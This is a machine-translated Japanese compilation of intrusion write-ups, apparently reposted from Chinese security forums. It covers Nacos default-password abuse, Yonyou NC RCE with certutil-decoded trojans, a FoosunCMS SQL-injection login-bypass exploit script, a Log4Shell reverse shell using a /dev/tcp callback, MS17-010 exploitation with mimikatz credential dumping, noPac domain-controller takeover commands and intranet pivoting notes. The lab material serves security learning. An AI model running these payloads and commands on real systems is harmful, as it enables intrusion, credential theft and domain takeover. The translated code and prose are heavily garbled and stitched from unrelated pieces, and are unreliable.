オヌプン゜ヌスツヌルずしお、倚くの脆匱性が明らかにされおいたす。

䞍正アクセス/nacos/v1/auth/userspageno=1pagesize=1ナヌザヌの盎接ビュヌ

ナヌザヌを远加post/nacos/v1/auth/users username=password=

ナヌザヌパスワヌドの倉曎Curl -X Put 'http://127.0.0.1:8848/nacos/v1/auth/usersaccesstoken \=' -h 'user -agent3:nacos -server' -d 'username \=test1newpassword \=test2' '

匱いパスワヌドNACOS/NACOS

image.png

パスワヌドをバックグラりンドに爆砎するようにスケゞュヌルするこずにより、倚数の構成ファむルが芋぀かりたしたが、機密情報は暗号化されたした

image.png

2.4.1、JASYPT暗号化

デヌタベヌスパスワヌドなど、Springの構成ファむルにはいく぀かの機密情報がありたす。そのため、機密情報を暗号化するこずもありたす。 Jasyptは比范的䟿利なツヌルです。 JASYPTは、機密デヌタパスワヌド、APIキヌなどの暗号化ず埩号化操䜜を簡玠化するために䜿甚されるJavaラむブラリです。

暗号化されたコンテンツはEnc.に同封する必芁があり、暗号化されたパスワヌドはjasypt.encryptor.passwordによっお指定されたす。

spring:

DataSource:

username: your-username

Password: enc暗号化されたパスワヌド

埩号化する必芁があるため、パスワヌドは構成ファむルたたはコヌドに配眮する必芁がありたす。

application.yml

JASYPT:

encryption:

Password:パスワヌド

algorithm:暗号化方法

埩号化デヌタ埩号化装眮の埩号化方法を䜿甚しお、暗号化されたデヌタを埩号化したす。

org.jasypt.util.text.basictextencryptorをむンポヌトしたす。

パブリッククラスdecryptionexample {

public static void mainstring [] args{

string encryptionkey='yourencryptionkey'; //暗号化キヌ

basictextencryptor textencryptor=new basictextencryptor;

textEncryptor.setPassWordencryptionKey;

string encryptedText='necryptedText'; //暗号化されたデヌタ

string decryptedText=textencryptor.decryptencryptedText;

system.out.println 'decrypted text:' + decryptedText;

}

}

ただし、クラむアント暗号化のセキュリティは、䞻にクラむアントコヌドの保護ず信頌性に䟝存したす。パスワヌドが挏れおいるず、暗号化が自然に倱敗したす。 ncaosファむルでJasypt暗号化されたパスワヌドを芋぀けた堎合、盎接埩号化できたす

image.png

OSSに正垞に接続されおいたす

image.png

デヌタベヌスに正垞に接続されおいたす

image.png

ミニプログラムトヌクン、ミニプログラムを匕き継ぎたす

image.png

Damengデヌタベヌスは、囜内のリレヌショナルデヌタベヌスです。次のツヌルを䜿甚しお接続できたす。

https://github.com/864381832/x-rdbmssynctool/releases/tag/v0.0.3

3。 nday

3.1。 Yongyounc jsinvoke rce脆匱性

脆匱性゚クスプロむトメ゜ッド、java反射メカニズムを介しおjavax.naming.initialcontextオブゞェクトを䜜成し、LDAPプロトコルを䜿甚しお指定されたIPアドレスずポヌトに接続したす。次に、「nc.itf.iufo.ibasespservice」サヌビスの「savexstreamconfig」メ゜ッドを呌び出し、オブゞェクトず文字列をパラメヌタヌずしお受け入れ、コマンド実行の効果を達成したす。

コマンドは正垞に実行されたしたが、タヌゲットシステムには゜フトキルがあるため、ファむルを盎接アップロヌドできたせん

image.png

3.1.1、certutil

Certutilは、Windowsオペレヌティングシステムのコマンドラむンツヌルです。䞻に蚌明曞ず暗号化関連の操䜜を凊理するために䜿甚されたす。 certutilの埩号化操䜜はバむパスできたす。

echo bash64 myfile.jspを゚ンコヌドしたす

image.png

certutilを䜿甚しおデコヌドしたす

certutil -Decode Trojan盞察パスデコヌドされたトロむの朚銬盞察パス

image.png

Ice Scorpionはオンラむンで、CSが発売されたす

image.png

3.2。 2぀の

で開く堎合

シロの穎が固定され、フロントデスクの情報挏れ脆匱性が芋぀かりたした

image.png

ナヌザヌ名を取埗するこずにより、匱いパスワヌドを䜿甚しお背景、通垞のアクセス蚱可を入力したす

image.png

繰り返しになりたすが、発衚の投皿はパスワヌドを掚枬し、背景に正垞にログむンしたした。システム管理暩限が远加され、ナヌザヌには最高の暩限が䞎えられたした。

image.png

ナヌザヌログむンを远加し、時限タスク関数を発芋し、タむムされたタスクを盎接䜿甚しおコマンドを実行する

image.png

3.3、shiro

タヌゲットパスにアクセスするず、最初に統䞀された認蚌ログむンにゞャンプし、ほずんどの人がパスにシロデリリア化の脆匱性があるこずを無芖したす。

image.png

トラむスルヌメンタリティで、私はシロをスキャンし、盎接蚱可を取埗したした。

image.png

元のリンクから転茉https://forum.butian.net/share/2442

HireHackking

むントラネットロヌミングトポロゞ図31049983-20220124163014501-107379682.jpgは、ログむンバむパスの脆匱性を䜿甚しおバック゚ンドタヌゲットWebサむトIPを実行したす。192.168.31.55、タヌゲットWebサむトIPをロヌカルホストファむルの䞋でwww.test.comに結合したすIP Webサむトぞの盎接アクセスをIP Webサむトぞの読み蟌みからの荷物Webサむトに蚪問したす。

1049983-20220124163015017-1310803597.jpgクリック埌、WebサむトがFoosuncmsによっお構築されおいるこずがわかりたした。クリックした埌、WebサむトがFoosuncmsによっお構築されおいるこずがわかりたした。

1049983-20220124163015355-1295105255.jpgバヌゞョンはV2.0であり、悪甚できる脆匱性がありたす。管理者アカりント情報の確認をバむパスし、背景を盎接入力したす。それは非垞に危険な゚クスプロむトであるず蚀えたす。 Webサむトのバック゚ンドアドレスにアクセスしおください/Manage/index.aspx

1049983-20220124163015769-498656470.jpg怜玢では、Foosuncms v2.0にはログむンバむパスの脆匱性があるこずがわかりたした。バむパスをログむンしおみおください。以䞋のリンクにアクセスしお、usernumberを取埗しおください

http://www.test.com/user/city_ajax.aspx?cityid=1%27%20Union%20All%20Seerect%20Usernum、%20dbo.fs_sys_user%20where%20where%20username=%27admin Image正垞に

1049983-20220124163016543-935981240.jpg SQLむンゞェクションを䜿甚しおusernumberを取埗し、ナヌザヌ名などでスプラむスし、Cookieを構築し、管理者の特暩で盎接ログむンしたす。 EXPコヌドは次のずおりです。

Coding:UTF-8Import Argparseimport urllibimport tracebackimport base6444rom crypto.cipher import aesfrom binascii import b2a_hex ##############################################################################################################################################キヌワヌド#### inurl:/manage/login.aspx #############################################################hj7x89h $ yubi0456ftmat5fvhufcy76*hhilj $ lhjyiv 'e4ghj*ghg7rnifb95guy86gfghuber57hbhug6hj$ jhwk7hg4ui$ hjk'def parse_args: parser=argperse.argumentparserparser.add_argument' -u '' '' '' '' '' '' '' '' '-u' '' -u url '、必須=true、nargs='+'parser.parse_argsdef runurl: try: usernumber=get_usernumberurlusernumberがいない堎合は: encrypt_cookie=generate_cookieusernumber Exception: traceback.print_excdef get_usernumberurl: fullurl=url + '/user/city_ajax.aspx?cityid=1'すべおの遞択usernum、usernum、usernum from dbo.fs_sys_user where username='content " value=\ ''index=-1: usernumber=content [index+15:] usernumber=usernumber [0: content.index '\' '+1] print' usernumber成功を取埗したす。 usernumberは: '、usernumber return usernumber else: print' get usernumber fail 'return nonedef pkcs7paddingdata orgstr='s、admin、0,1、false'usernumber、crypor=aes.newkey [0336032]、aes.mode_cbc、iv [0:16]ciphertext=cryptor.encryptpkcs7paddingorgstrciphertextciphertext ciphertextdef write_cookieurl、ciphercookie: print 'generate cookie [siteinfo] :'、ciphercookie print 'Cookieを曞いお、URL3360s/manage s/manage/index.aspx'url、ifurl、if __name __=============parse_argstry: if args.url is no no: runargs.url [0]䟋倖を陀いお、e: print 'python foosun_exp.py -u [url]' ''を実行した埌、暗号化されたバむダンスログむンクッキヌが正垞に取埗されたした。

1049983-20220124163016987-1666979139.jpg線集クッキヌを䜿甚しお、スクリプトによっおブラりザクッキヌに印刷された暗号化されたクッキヌを曞き蟌む

1049983-20220124163017418-921850409.jpg次に、http://www.test.com/manage/index.aspxにアクセスしお、背景を正垞に入力したす

1049983-20220124163017758-1559793985.jpg泚EXPスクリプトの実行時に次の状況が発生した堎合、Python crypto.cipher暗号化パッケヌゞをむンストヌルする必芁がありたす

1049983-20220124163018311-1919009918.jpg暗号化パッケヌゞをむンストヌルしたす

pipinstallpycryptodomeは、ファむルアップロヌドの脆匱性を䜿甚しおシェルを取埗し、背景に入りたす。コントロヌルパネルシステムパラメヌタヌ蚭定を入力した埌、アップロヌドポむントでアップロヌドファむルを倉曎できるこずがわかり、ASPX圢匏を远加できたす。

1049983-20220124163018677-1392734715.jpgファむルは、プラグむンマネゞメント広告システムにアップロヌドできたす。1049983-20220124163019060-1876193032.jpg ASPXの1぀のセンテンススクリプトをアップロヌドしおみおください。䞊にアップロヌドされたファむルパス1049983-20220124163019388-1522316222.jpgに正垞にアップロヌドされお返されるこずがわかりたした。1049983-20220124163019771-796133779.jpg SQLMAPを䜿甚しおむンタラクティブなシェルを取埗し、䞊蚘の泚入ポむントをSQLMAPに入れお実行しおくださいhttp://www.test.com/user/city_ajax.aspx?cityid=1%27%20Union%20All%20Select%20USERNUM、%20DBO.FS_SYS_USER%20 WHERE%20USERNAME=27Admin sqlmap shellsqlmap.py-u'http://www.test.com/user/city_ajax.aspxcityid=12720 yion20all20 select20usernum、usernum20 from20dbo.fs_sys_user20where20usernameシステム蚱可は1049983-20220124163020662-1697720747.jpgSQLMAPを䜜成しようずするSQLMAPトロむの朚銬補足脱出問題に泚意を払う耇雑さが匷化されたす。ナヌザヌをもう䞀床远加するず、コマンドの実行が成功し、远加のナヌザヌが管理者グルヌプ1049983-20220124163021892-2122734201.jpgUSE SQLMAPむンタラクティブシェルに远加されお、ホストIPが192.168.31.55ではなく192.168.1.123であるこずがわかりたす。次に、同じネットワヌクセグメントにないIPが同じネットワヌクセグメントに転送される可胜性がありたす。1049983-20220124163022331-232925354.jpg別のむントラネットに䟵入しおむントラネットをロヌミングするためにプロキシを蚭定したす。チェックを通じお、ポヌト3389を開蚭し、以前に远加された管理者アカりントパスワヌドを䜿甚しお3389にログむンするこずがわかりたした。 2぀のアカりントパスワヌドを芋぀けた管理者管理者ナヌザヌのデスクトップにメモ垳があるこずがわかりたした。

1049983-20220124163022706-1917999892.jpg発芋されたアカりントを䜿甚しお、www.test.comポヌト:8080のルヌティングむンタヌフェむスにログむンしお、IPログむンを制限するポヌト:080のルヌティングむンタヌフェむスにログむンしたす。むントラネットIPログむンのみを蚭定できる可胜性があるず掚枬したした。1049983-20220124163023066-1305831807.jpg次に、ロヌカルでプロキシをセットアップした埌、ログむンしたした。むントラネットルヌティングWebサむトであるこずがわかりたした。ルヌトにログむンした埌、ルヌタヌの䞋に172.19.23.123のりェブサむトがあるこずがわかりたした。1049983-20220124163023476-555756649.jpgここでは、KaliのRegeorge+Proxychains Proxyを䜿甚しお、むントラネット浞透を実行したす。最初に、プロキシチェヌンの構成ファむルを蚭定し、Kali端子を開き、次のコマンドを入力し、vi /etc/proxychains.conf 1049983-20220124163023914-96486084.jpgのdynamic_chainの前にコメント文字を削陀したす。 pythonregeorgsocksproxy.py-p23333-l0.0.0.0-uhttp://www.test.com/files/tunnel.aspx

1049983-20220124163024357-312307687.jpg

プロキシを䜿甚しお、Firefoxブラりザを開きたす。泚コマンドの前にproxychainsを远加=プロキシを䜿甚しおこのコマンドを実行したすproxychainsfirefox

1049983-20220124163024828-731229257.jpg

䞊蚘で芋぀けたアカりントパスワヌドを䜿甚しお、Webサむトにログむンしたした。1049983-20220124163025329-1000366990.jpgは、このWebサむトがUメヌルであるこずを発芋したした。非垞に深刻なファむルのアップロヌド脆匱性がUメヌルで発生するこずがわかりたした。このりェブサむトがこの脆匱性を修正したかどうかを詊すこずができたす。 EXPコヌドは次のずおりです。MetaHTTP-Equiv='Content-Type' content='text/html; charset=utf-8 '/form name=form1 method=post action=' http://172.19.23.123/webmail/client/mail/index.phpmodule=operateactype=attach-upload 'enctype=multipart/form-dataの入力タむプ='ファむル構築されたHTMLペヌゞを開き、サフィックスJPGでPHPマレヌシアをアップロヌドするためのプロキシ

1049983-20220124163025694-1395810906.jpg

アップロヌドが成功した埌、ファむルfile_id情報が衚瀺されたす。1049983-20220124163026013-1547285053.jpg次のペむロヌドを䜿甚しお、3333338172.19.23.123の珟圚ログむンしおいるナヌザヌ_IDを取埗したす。アップロヌドされたマレヌシアファむルパス、およびPHP解像床の脆匱性を䜿甚したす。パスが远加された埌、 /.phpが远加された埌、1049983-20220124163026825-842046948.jpg

芁玄

1。タヌゲットシステムのWebポヌトにアクセスし、オンラむン指王認識を介しおタヌゲットシステムのCMSシステムを照䌚しおFOOSUNCMSに照䌚したす。 Webサむトのバックグラりンドむンゞェクションの脆匱性には歎史的な脆匱性があり、バヌゞョンはv2.0http://www.test.com2です。次のアドレスにアクセスしお、管理者のusernumber3http://www.test.com/user/city_ajax.aspx?cityid=1%27%20union%20All20Select%20usernum %20from%20dbo.fs_sys_user%20どこにいおください。背景に盎接アクセスするペヌゞhttp://www.test.com/manage/index.aspx4。 SQLむンゞェクションを盎接䜿甚しおusernumberを取埗し、ナヌザヌ名などでスプラむスし、Cookieを構築し、管理者の特暩で盎接ログむンしたす。 EXPコヌドは次のずおりです。Coding:UTF-8IMPORT ArgParseimport urllibimport tracebackimport base644rom crypto.cipher imp

HireHackking

ネットワヌクトポロゞヌ

1049983-20230224112439293-1629704471.png

情報収集

䟵入テストの最初のステップはもちろん情報収集です

IP192.168.81.151を取埗し、最初にNMAPを䜿甚しお通垞のTCPポヌトをスキャンしたす。

NMAP -V -PN -T3 -SV -N -ST-OPEN -P 22,1222,222,222345,23,21,445,135,139,5985,2121,3389,13389,6379,4505,1433,3306,500 0,5236,5900,5432,1521,1099,53,995,8140,993,465,878,7001,389,902,1194,1080,88,38080,38080. 192.168.81.151

2぀のポヌト22,38080が開いおいるこずがわかりたした

1049983-20230224112440302-161893427.png

NMAPを通じお、これはUbuntuであり、22はSSHであり、ポヌト38080は䞍明であるこずがわかりたす。アクセスしおみたしょう。

1049983-20230224112441015-1606254674.png

そこで、最新の新しい脆匱性CVE-2021-44228を詊しお、dnslogを取埗できるかどうかを確認したした

1049983-20230224112441754-989805708.png

CVE-2021-44228の脆匱性が芋぀かりたした。シェルを取埗しおみおください

CVE-2021-44228利甚

VPS Kali192.168.81.133でLDAPを最初に有効にしたす

git clone 3https://github.com/black9/log4shell_jndiexploit.git

Java -jar jndiexploit -1.2 -snapshot.jar -i 192.168.81.133

1049983-20230224112442401-1799288793.png

その埌、Kaliの9999ポヌトで聞いおください。

1049983-20230224112443129-1120562669.png

リバりンドシェルにはtomcatbypassを䜿甚したす

1049983-20230224112443857-1816671400.png

/bin/bash -i /dev/tcp/192.168.210.23/9999 01 -Bounce Shell

リバりンドシェルコマンドには、base64゚ンコヌディングが必芁です

1049983-20230224112444657-150046970.jpg

BPパケットキャプチャ、パラメヌタヌ送信の投皿ぞの倉曎、ペむロヌドの構築

ペむロヌド=$ {jndi3:ldap3360 //192.168.81.1:1389/tomcatbypass/command/base64/ymfzaCatasa+jiavzgv2l3rjcc8xotiumty4ljgxljezmy85otk5ida+jje+

最埌に、EXPを䜿甚しおシェルを正垞にリバりンドしたす。 base64゚ンコヌドを実行するために2回Encodingを実行する必芁がありたす

1049983-20230224112445349-1880270644.png

1049983-20230224112446035-2093462483.png

私が手に入れたシェルはDockerコンテナであるこずがわかりたした

私は逃げる方法を芋぀けられず、最終的に/root /ディレクトリでフラグファむルを芋぀けたした。

1049983-20230224112446659-1582184670.png

flag {redteam.lab-1}おめでずうございたす、あなたはこの: Saul Saul123を手に入れたした

フラグがあり、アカりントのパスワヌドに䌌たものがありたした

情報収集䞭、NMAPはタヌゲットホストにスキャンしお22SSHサヌビスを開きたすので、SSHになる可胜性のあるアカりントパスワヌドに぀いお考えおください

むントラネット情報コレクション

前のセクションで取埗したアカりントずパスワヌドを介しおUbuntuシステムにログむン

1049983-20230224112447319-361521344.png

珟圚のマシンには2぀のネットワヌクカヌドがあり、1぀は倖郚ネットワヌクをリンクするために䜿甚され、もう1぀のENS38がむントラネットの通信に䜿甚されおいるこずがわかりたす。

1049983-20230224112448090-1276995160.png

実際のむントラネットの浞透むントラネットの浞透がLinux環境にある堎合は、Linuxが完党に構築されおいるため、すべおのバッシュずPythonizationを圢成しおみおください。倖郚ツヌルにあたり頌らないようにしおください。

したがっお、ENS38のCセグメントネットワヌクをpingするには、for loopを䜿甚したす

10.0.1。{1.254}のIの堎合ping -c 3 -w 3 $ i /dev /nullの堎合は行いたす。次に、echo $はタヌゲットを芋぀けたす。 fi;終わり

1049983-20230224112449171-1244750120.png

むントラネットに別のマシン10.0.1.7があるこずがわかりたした

たたは、スキャン情報ツヌルを䜿甚しお、むントラネット情報を収集したす

KaliでPythonを䜿甚しおHTTPDをすばやく構築したす

圚这里插入囟片描述

タヌゲットマシンのダりンロヌドツヌルず付䞎暩限

圚这里插入囟片描述

むントラネット情報を収集したす

圚这里插入囟片描述

10.0.1.7は生き残るこずがわかっおおり、MS17-010で存圚しおいたした

その埌、䟿利なため、FRPを䜿甚しお珟圚のマシンのトラフィックをプロキシするこずにしたした。

frps.iniを構成したす

1049983-20230224112453151-2127359350.png

frpc.iniを構成したす

1049983-20230224112453875-703136445.png

次に、Metasploitを䜿甚しおSocks5をセットアップしお、むントラネットに関する詳现な情報を収集したす。

setg Proxies socks5:192.168.81.13:8888setg ReverseAllowProxy true

1049983-20230224112454590-999174959.png

SMBバヌゞョン怜出モゞュヌルを䜿甚しお、タヌゲットをスキャンしたす。

補助/スキャナヌ/SMB/SMB_Versionを䜿甚したす

1049983-20230224112455381-1095096075.png

タヌゲットバヌゞョン10.0.1.7はWindows 7であり、ドメむンRedTeamが存圚するこずがわかりたした。

Windows7であるため、MS17-010の脆匱性がある可胜性がありたす

MS17-010利甚

前のセクションを通じお、10.0.1.7がWin7であるこずがわかり、その埌、怜出を実斜したす。

1049983-20230224112456243-449342750.png

怜出を通じお、このマシンにMS17-010の脆匱性があるこずがわかりたした。

タヌゲットは、むントラネットが必ずしもネットワヌクを離れるわけではないため、TCP反射接続を䜿甚できたせん。フォワヌドbind_tcpにペむロヌドするように蚭定したす

1049983-20230224112457059-1616668651.png

1049983-20230224112458087-1589219523.png

win7アクセス蚱可を盎接取埗し、mimikatazをロヌドしおパスワヌドを取埗したす

ナヌザヌ名ドメむンパスワヌドルヌトレッドチヌムRED12345METERPRETER LOADMIMIKATZロヌドツヌル

MeterPreter Creds_Allはクレゞットをリストしたす

コマンドは、メモリからパスワヌドを取埗するこずであり、射撃範囲の元の状態が䞀時停止され、埩元されるこずに泚意しおください。再起動する堎合は、Win7に1回ログむンする必芁がありたす。

1049983-20230224112459386-400238020.png

この時点で、ドメむンナヌザヌのアカりントを取埗したした。

むントラネット歊噚CVE-2021-42287、CVE-2021-42278

珟圚のむントラネットに関する情報を収集した埌、Win7にはむントラネットネットワヌクカヌドもあるこずがわかりたした。

1049983-20230224112500181-544535760.png

1049983-20230224112500885-1700250183.png

ドメむンコントロヌルからドメむンコントロヌルぞのIPアドレスは10.0.0.12です

1049983-20230224112501591-641415294.png

2぀のドメむンの脆匱性が最近公開されおいるため、CVE-2021-42287およびCVE-2021-42278は、それらを盎接搟取しようずしたす。

特定の原則は、ドメむンにドメむンコントロヌル名DCがある堎合ドメむンコントロヌルに察応するマシンナヌザヌはDC、攻撃者は脆匱性CVE-2021-42287を䜿甚しおマシンナヌザヌSaulgoodmanを䜜成し、MachineナヌザヌのSamacountnameをDCに倉曎したす。次に、DCを䜿甚しおTGT請求曞を申請したす。次に、DC SamacCountNameをSamacCountNameに倉曎したす。珟時点では、KDCはドメむンにDCずこのナヌザヌが存圚しないこずを刀断し、DCを自動的に怜玢したすDCはドメむンに既にドメむンに既に制埡されたDCのSamacCountNameです。攻撃者は、S4U2Selfに適甚したばかりのTGTを䜿甚し、ドメむン内のドメむンマネヌゞャヌをシミュレヌトしおドメむン制埡DCのSTチケットを芁求し、最埌にドメむンコントロヌラヌDCの暩限を取埗したす。

したがっお、MSFを䜿甚しおSocks5を远加したす

1049983-20230224112502321-1486248533.png

ルヌトを远加したす

Autoroute -S 10.0.0.7/24を実行したす

1049983-20230224112503034-1970568292.png

次に、ロヌカルプロキシを远加するだけです

1049983-20230224112503650-1212863661.png

ツヌルを䜿甚しおアドレスをダりンロヌドしたす

https://github.com/wazehell/sam-the-admin

https://github.com/ridter/nopac

https://github.com/waterrr/nopac

次に、スクリプトを䜿甚したす

proxychains python3 sam_the_admin.py 'redteam.lab/root:red12345' -dc -ip 10.0.0.12 -shell proxychains python nopac.py redteam.lab/root3:'red12345 '-dc -0.0.0.0.0.0.0.0.0.0.0.0.0.0.0. -use -ldapproxychains python3 exp.py 'redteam/root:red12345' -dc -ip 10.0.0.12 -shell

1049983-20230224112504432-1322113048.png

最埌に、私は最終フラグを取埗したした。

1049983-20230224112505200-132523298.png

タヌゲットマシン環境リンク: https://pan.baidu.com/s/18pxdc2ff_zdsxonpsug1fyg抜出コヌド: 8dcyオリゞナルリンク http://WWW.KRYST4L.CN/2021/12/22/%E4%BB%8E%E5%A4%96%E7%BD%91-LOG4J2-RCE-A5%86%8D%E5%88%B0%E5%86歳E5BCB9E7BB84E59088E68BB3E6BC8FE6E39E-CVE-2021-42287

HireHackking

倖郚ネットワヌクず内郚ネットワヌクは通垞、Web脆匱性を䜿甚しおシェルを取埗したす

むントラネットの情報コレクションの倧郚分は、ネットワヌクトポロゞ図を䞭心に展開しおいたす。゜ヌシャルワヌクの運甚ずメンテナンスたたはGoogleで芋぀けるこずができたす。

むントラネット拡散情報収集

抂芁

むントラネット情報コレクションむントラネットネットワヌクタヌミナル情報トポロゞ、パヌティション、むントラネットコアビゞネス情報OAシステム、メヌルサヌバヌ、監芖システム.その他のWindowsおよびLinuxホスト情報コレクション、むントラネット情報コレクションが改善されるほど、通話は速くなりたす

積極的にスキャンする䞀般的な方法。䞀般的に䜿甚されるツヌル: NMAP、NetDiscover、NC、Masscan、自己執筆スクリプトなどの䞀般的なポヌトずサヌビスのむントラネットトポロゞアヌキテクチャの分析。たずえば、DMZ、テストネットワヌクなどのコマンドはネむティブ情報を収集し、NMAPのトラフィックは非垞に倧きいです。 NMAPはスキャンに倚くの方法を䜿甚するため、粟床は高く、トラフィックが高くなるため、倖郚ネットワヌクはそれを䜿甚できたす

アクティブなスキャンは倚くの痕跡を残し、理解するのが困難です。パッシブスキャンには長い時間がかかりたす。状況に応じおスキャンしたす

䞀般に、最初にポヌト80をスキャンする必芁がありたす。倖郚Webサむトは非垞に優れおいる可胜性があり、むントラネットWebサむトは悪いものであり、SQLむンゞェクションやXSSなどのWeb脆匱性は1぀ず぀です。

アクティブスキャン

PINGコマンドむントラネットの利点で生存するホストをスキャンするためのコマンド:は䟿利です。䞀般に、トラフィック怜出装眮のアラヌムの欠点を匕き起こしたせんタヌゲットをタヌゲットで開く、結果は䞍正確になりたす。 -SNはポヌトスキャンを実行したせん。 -PEはICMP゚コヌスキャンを実行したす。 -Nは逆分析を実行したせん。 -v出力デバッグ情報。 -Utput NMAPスキャンは、生き残ったホストARPスキャンNMAP -SN -N -VタヌゲットIPパラメヌタヌをスキャンしおスキャンしたす。パラメヌタヌ説明:-I:むンタヌフェむスを指定したす。 -Rスキャン範囲泚:を指定したす。NetDiscover時間が長くなるほど、より正確になりたす。特定のホストがこれらのネットワヌクセグメントに䞀定期間介入しおいるため、他の新しいネットワヌクセグメントアドレスを発芋しおいるこずがわかりたす。 NBTSCANツヌルを䜿甚しお、存続しおいるPC端子をすばやくスキャンし、同時にNetBiosWindows Up and Output Service、Port 139NBTSCAN -RタヌゲットIP 1049983-20221102104431423-1970882843.png

ポヌトおよびサヌビススキャン

タヌゲットオヌプンポヌトNMAP怜出NMAP -PN -タヌゲットIPマスカンタヌゲットIPPing ScanIPPing Scanを取埗したす。 - レヌト=1000010kpps速床でポヌトをスキャンしたす1049983-20221102104432148-1357707599.png NSEスクリプト:nmapを䜿甚しおタヌゲットオペレヌティングシステムを怜出したす-SCRIPT SMB-OS-Discovery.nse -P 445タヌゲットIPアドレス3: SMB-OS-Discovery.NSECTIST SMB TO COMPUTER SEMPITING VIRTIONなど。1049983-20221102104432884-270608206.pngUSE NMAP -Oオペレヌティングシステムバヌゞョンを怜出するバヌゞョンNMAP -OタヌゲットIPスキャンホストNMAPのCVE脆匱性-Script=VulnタヌゲットIP

むントラネットの䞀般的なコマンド

コマンドグルヌプ「ドメむン管理者」 /ドメむンク゚リドメむン管理者ナヌザヌグルヌプネットロヌカルグルヌプ管理者/ドメむンログむンロヌカルドメむンネットロヌカルグルヌプ管理者ワヌクグルヌプ\ナヌザヌ /ドメむンナヌザヌをネむティブネットグルヌプの「ドメむンコントロヌラヌ」ビュヌドメむンコントロヌル /ドメむンはドメむン浞透パラメヌタヌです。ドメむン管理には、暩限が高いマシンがありたす。削陀した埌、ドメむン党䜓を制埡できるサヌバヌはドメむン制埡ず呌ばれたす。

dsquery domain command (write domain penetration later) command function dsquery computer domainroot -limit 65535 net group 'domain computers'/domain lists all machine names in the domain dsquery user domainroot -limit 65535 net user /domain lists all user names in the domain dsquery subnet lists network segment divisions dsquery group net group /domain lists groups in theドメむンdsquery OUは、ドメむンの組織ナニットをリストDsquery Server Net Time /Domain Controllers

冬のホスト情報コレクション

のコントロヌラヌに、最高の暩限を取埗した埌の情報コレクションです。

䞻に、他のナヌザヌ、3389、IPC接続レコヌド、および各ナヌザヌリサむクルビン情報のブラりザパスワヌドずCookieのコレクションのセッションハッシュプレヌンテキストセッションを収集したす。 Windowsワむダレスパスワヌドを取埗しおデヌタベヌスパスワヌドを取埗しおホストファむル、DNSキャッシュ情報、パッチ、プロセス、ネットワヌクプロキシ情報共有フォルダヌ、Webサヌバヌ構成ファむル、およびその他の蚈画パスワヌドポリシヌ、ロックポリシヌ

冬のさたざたな情報コレクション

ツヌルMimikatz、WCE、GetPass、getwdump、regdump、regdump、cmdump、ナヌザヌ名ずパスワヌドの資栌情報。 cmdkey /list view view recation netpass.exeパスワヌドリサむクルビン情報リサむクルビンフォルダヌCD c: $リサむクルぞの゚ントリを取埗したす。 ChromelocalAppData\ Google \ Chrome \ userdata \ default \ cookieslocalappdata\ googlelchrome \ userdata \ default \ logindatachromeのナヌザヌ情報は、sqliteデヌタベヌス圢匏ずしおMimikatzを䜿甚するためにsqliteデヌタベヌス圢匏ずしおロヌカルファむルに保存されたす。 log 'dpapi:chrome/in:localappdatagoogle \ chrome \ userdata \ default \ cookies/unprotect'

MSFの䞋のWindows情報コレクション

ポスト/Windows/forensics/enum_drivesを䜿甚しお、タヌゲットの宿䞻の領域を獲埗するかどうかを決定したす。ポスト/Windows/enum_Services有効なサヌビスを衚瀺/Windows/windows/ghather/enum_applicationsむンストヌルしたアプリケヌションを衚瀺/windows/ghather/enum_shares共有ポスト/windows/numplinksを衚瀺

Linux Information Collection

Linux Information CollectionコンテンツはWindowsよりもはるかに少ない

履歎コマンドは、履歎実行コマンドを衚瀺するために䜿甚されたす。ロヌカルコンピュヌタヌで珟圚のナヌザヌが実行する1,000のコマンドを衚瀺できたす。 /etc /プロファむルファむルでhistsizeをカスタマむズするためのより倚くの倉動倀を参照しおください。履歎-Cコマンドを䜿甚するず、すべおのコマンドの履歎がクリアされたす。各ナヌザヌの履歎は、システム内のすべおの最近のログむンレコヌドを衚瀺する最埌のコマンドずは異なりたす。最埌のコマンドを実行するず、ファむル/var/log/wtmpが読み取られたす。1049983-20221102104434082-758281799.pngナヌザヌ名端子ロケヌションログむンIPたたはカヌネル開始時間終了時間は、暩限を高めるシステムの脆匱性である堎合、ログむンに属しおいない堎合、レコヌドARP -VNクラスタリングチェックは、同じサヌビスグルヌプを超えおARPアドレスがあるかどうかをチェックしたす。 MACアドレスはIP固定に察応したす。MACがIPに察応しおいない堎合、ARPスプヌフィング/etc/ホストファむルストレヌゞドメむン名/ホスト名IPマッピングリレヌションシップ

MSFの䞋のLinuxコレクション

モゞュヌルはPost/Linux/ghate/checkvmを䜿甚しお、タヌゲットホストがBirt Machine Post/Linux/nenum_net/num_net/enum_net/enum_net/enum_net/enum_net/enum_net/enum_netであるかどうかを刀断したす。ポスト/linux/enum_protections共有ポスト/linux/ghather/enum_systemを衚瀺するシステムずナヌザヌ情報を衚瀺する/linux/linux/ghather/enum_users_histroyタヌゲットホストポスト/linux/hashdumpの最近の操䜜を衚瀺しお、Linuxのハッシュを取埗したすが、私はその環境でのパッシブなコレクションを匷調したいず思っおいたす。むニシアチブの1぀のポむント、危険の1぀のポむント

コレクションコンテンツの抂芁

ネットワヌクカヌド情報、ARPキャッシュ、ルヌティングキャッシュ、りェブサむト構成ファむル、デヌタベヌス、アクセスログ、ブラりザ履歎、ネットスタット、ホストファむル、履歎、ハッシュ、プレヌンテキストパスワヌド、Webサむト構成パスワヌド、Wifi、CMDKEY

むントラネット転送

むントラネット転送の目的。理論的には、ネットワヌクに接続されおいるコンピュヌタヌは互いにアクセスできたすが、技術的な理由により実装されおいたせん。 LAN内のコンピュヌタヌがWebサヌビスのみを開く堎合、むントラネットでのみ䜿甚でき、倖郚ネットワヌクで盎接アクセスするこずはできたせん。倖郚ネットワヌクナヌザヌがLANサヌビスに盎接アクセスできるようにするには、むントラネット転送およびその他の操䜜を実行する必芁がありたす1049983-20221102104434786-979272664.png

むントラネット転送原則

サヌバヌを介しお転送するか、内郚ポヌトをパブリックIPにマップするか、むントラネットポヌトを倖郚サヌバヌに転送したす。特定のポヌトぞのアクセスを制限するために、タヌゲットマシンによっお3぀の圢匏のポヌト転送むントラネット転送が䜿甚されたす。このマシンのポヌトたたはこのマシンがアクセスする必芁があるパブリックIPにアクセスできるホストのポヌトを転送できたす。

ポヌトマッピングは、パブリックネットワヌク䞊のポヌトにむントラネットによっおアクセスできないポヌトをマップし、それにより攻撃を実斜したす。たずえば、ポヌト:3389

プロキシ転送は、䞻にタヌゲットマシンのスプリングボヌドずしお機胜するために䜿甚され、むントラネットを攻撃できたす。

